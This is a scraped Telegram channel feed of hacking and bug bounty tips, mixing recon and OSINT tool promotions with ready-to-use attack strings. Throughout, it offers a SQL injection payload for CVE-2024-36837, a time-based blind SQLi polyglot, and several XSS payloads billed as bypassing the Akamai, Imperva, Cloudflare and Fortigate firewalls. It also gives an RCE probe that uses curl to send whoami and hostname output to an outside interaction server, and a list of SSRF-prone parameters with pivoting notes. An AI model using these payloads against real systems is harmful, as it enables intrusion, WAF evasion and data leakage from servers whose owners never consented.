BugCod3
7.28K subscribers
333 photos
6 videos
7 files
442 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
SQLI Injection
CVE: 2024-36837

Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀2⚑2πŸ”₯2
JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u


#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀2πŸ”₯2πŸ‘1
XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`


#BugBounty #Tips #XSS
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑6πŸ”₯6❀3
This media is not supported in your browser
VIEW IN TELEGRAM
SubCerts

πŸ’¬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

πŸ“Š Features:
βšͺ️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

βšͺ️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page titles
⚫️ Silent output for clean and organized results

βšͺ️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

βšͺ️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

πŸ”Ό Installation:
cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h


πŸ’» Usage:
To run SubCerts for a domain and save the results to a file:
./subcerts.sh -u example.com --output results.txt


😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #SubDomain #certificate
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4⚑3πŸ”₯3
WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4⚑3❀2πŸ‘1
XSS

Watch out for reflected XSS in the search parameter!

Payload:
"-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"


#XSS #BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6❀4⚑3πŸ‘3
Export to GBounty

πŸ’¬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

πŸ“Š Features:
βšͺ️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
βšͺ️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
βšͺ️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
βšͺ️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
βšͺ️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

πŸ”Ό Installation:
Prerequisites
βšͺ️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
βšͺ️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

πŸ’» Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

πŸ“‚ Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

πŸ“‚ Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:
gbounty -rf requests.zip


😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #Tips #GBounty
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯3πŸ‘1
XΩ“SS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱πŸ”₯
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#BugBounty #Tips #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6⚑3❀3
Time based SQLi Payload πŸ’£

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

Injection Points πŸ’‰
URI
parameter name (before & after)
parameter value (before & after)
HTTP Headers like User-Agent,etc...

#SQLi #Payload
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯3πŸ‘2
HACKER search engines

#BugBounty #Search #Engines #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯7⚑3❀3
Hacking Articles- Cyber Security Mindmap

πŸ’¬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

😸 Github

#Cyber #Security #Mindmap
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3πŸ”₯3❀2πŸ‘1
RCE - Can we still use this in HTTP Header?

`
'
;
$
>


curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5⚑3πŸ”₯3
JSNinja - "Hunting Bugs in JavaScript!"

πŸ’¬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

πŸ“Š Features:
βž• Extract URLs from JavaScript files!
βž• Identify sensitive information such as API keys and tokens!
βž• User-friendly interface!
βž•Open Source and actively maintained!

πŸ”Ό Installation:
sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt


πŸ’» Usage:
python3 jsninja.py -u http://example.com/script.js --secrets --urls

Command-Line Options:
βšͺ️ -u or --url: Specify a single JavaScript URL to fetch.
βšͺ️ --secrets: Look for sensitive information in the JavaScript content.
βšͺ️ --urls: Extract URLs from the JavaScript content.
βšͺ️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #JS #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘8❀6⚑3πŸ”₯3
Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}


Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

βšͺ️ Access services on the loopback interface of the remote server
βšͺ️ Scan internal network an potentially interact with internal services
βšͺ️ Read local files on the server using file:// protocol handler
βšͺ️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4πŸ”₯4⚑2
CloudFlare XSS Bypass!

OnXSS=<Img/Src/OnError=alert(1)>


It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑7❀5πŸ”₯5🀣3πŸ‘1
XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4

Payload: β€˜>alert(154)</script><script/154=’;;;;;;;

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯7❀4⚑3
Fortinet Fortigate XSS Bypass

Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ‘7πŸ”₯4❀3⚑3
πŸ¦… Blackbird πŸ¦…

πŸ’¬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

πŸ”Ό Installation:
cd blackbird
pip install -r requirements.txt


πŸ’» Usage:
Search by username πŸ‘€
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF πŸ“‚
python blackbird.py --email email1@email.com --pdf

✨ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Osint #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀8πŸ‘4πŸ”₯3⚑2
javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))


#js #extract #urls
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5⚑3πŸ‘3πŸ”₯3❀‍πŸ”₯2
β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo rm -rf *2024

β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo mkdir 2025


#Notification #NewYear
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸŽ‰12πŸ”₯5🍾3🀝1